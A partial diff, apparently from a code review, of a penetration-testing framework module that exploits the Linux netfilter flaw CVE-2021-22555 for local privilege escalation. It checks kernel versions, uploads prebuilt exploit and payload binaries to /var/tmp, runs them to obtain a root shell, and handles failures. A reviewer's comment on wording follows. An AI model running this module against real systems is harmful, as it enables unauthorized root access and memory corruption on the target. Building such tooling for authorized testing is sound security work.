modules/exploits/linux/local/netfilter_priv_esc.rb

```diff
@@ -0,0 +1,138 @@
+          'SideEffects' => [ ]
+        },
+        'References' =>
+          [
+            ['CVE', '2021-22555'],
+            ['URL', 'https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html'],
+            ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2021-22555'],
+            ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22555'],
+            ['URL', 'https://ubuntu.com/security/CVE-2021-22555']
+          ]
+      ))
+
+    register_options(
+      [
+        OptString.new('PAYLOAD_DIR', [true, 'Directory to write persistent payload file.', '/var/tmp'])
+      ]
+    )
+
+    deregister_options('ContextInformationFile', 'WfsDelay')
+  end
+
+  def base_dir
+    datastore['PAYLOAD_DIR'].to_s
+  end
+
+  def supported_kernels
+    ['5.8.0-48-generic', '5.4.89']
+  end
+
+  def kernel_supported?(kernel)
+    supported_kernels.include? kernel
+  end
+
+  def check
+    release = kernel_release
+    if kernel_supported? release
+      CheckCode::Vulnerable("Running against a system with kernel release #{release} that is vulnerable.")
+    else
+      CheckCode::Safe("The kernel release #{release} is not currently supported.")
+    end
+  end
+
+  def upload_exploit_binary
+    release = kernel_release
+    @executable_name = rand_text_alphanumeric(5..10)
+    @executable_path = "#{base_dir}/#{@executable_name}"
+
+    # Ubuntu 5.8.0-48-generic
+    if (release.include? '5.8.0-48-generic')
+      upload_and_chmodx(@executable_path, exploit_data('CVE-2021-22555', 'ubuntu_5_8_0_48_generic.elf'))
+    elsif (release.include? '5.4.89')
+      upload_and_chmodx(@executable_path, exploit_data('CVE-2021-22555', 'centos_5_4_89.elf'))
+    else
+      fail_with(Failure::NoTarget, 'The target OS cannot be targeted by this exploit. Considering submitting a PR to add support for this target!')
+    end
+    register_file_for_cleanup(@executable_path)
+  end
+
+  def upload_payload_binary
+    @payload_name = rand_text_alphanumeric(5..10)
+    @payload_path = "#{base_dir}/#{@payload_name}"
+    upload_and_chmodx(@payload_path, generate_payload_exe)
+    register_file_for_cleanup(@payload_path)
+  end
+
+  def run_payload
+    response = cmd_exec(@executable_path, @payload_path, datastore['CmdTimeout'])
+    if response =~ /No space left on device/
+      fail_with(Failure::PayloadFailed, 'The exploit failed! To try again, the remote system needs to be restarted as the memory has been corrupted.')
+    elsif response =~ /Executing payload binary/
+      print_good('Exploit completed successfully, shell should be returning soon!')
+    elsif response =~ /Error could not corrupt any primary message/ || response =~ /Error could not leak adjacent secondary message/
+      fail_with(Failure::PayloadFailed, 'The exploit failed! You can try running the exploit again. For the reason why, see: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html on primary and secondary messages.')
```

Comment:
Would clean up the english here and also mention that `# After too many failed attempts, the system needs to be restarted.`